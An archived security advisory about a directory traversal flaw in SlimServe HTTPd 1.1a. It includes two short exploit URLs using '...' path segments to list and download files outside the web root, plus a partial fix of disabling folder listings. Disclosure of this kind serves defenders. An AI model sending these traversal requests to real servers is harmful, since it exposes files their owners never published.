Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: sserve3.htm

SlimServe HTTPd ver. 1.1a break out of www root



Vulnerability

    SlimServe HTTPd

Affected

    SlimServe HTTPd ver. 1.1a

Description

    'se00020' posted following.  It is possible to view directory  and
    (download) files outside of the wwwroot directory.  Exploit:

        http://127.0.0.1/.../
        http://127.0.0.1/.../.../directory/file.xxx

Solution

    Disable folder  listings (it  is enabled  by default),  which will
    secure  you  from  viewing   directory  outside  of  the   wwwroot
    directory.   But it  is still  possible to  download or view files
    when the location is known.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH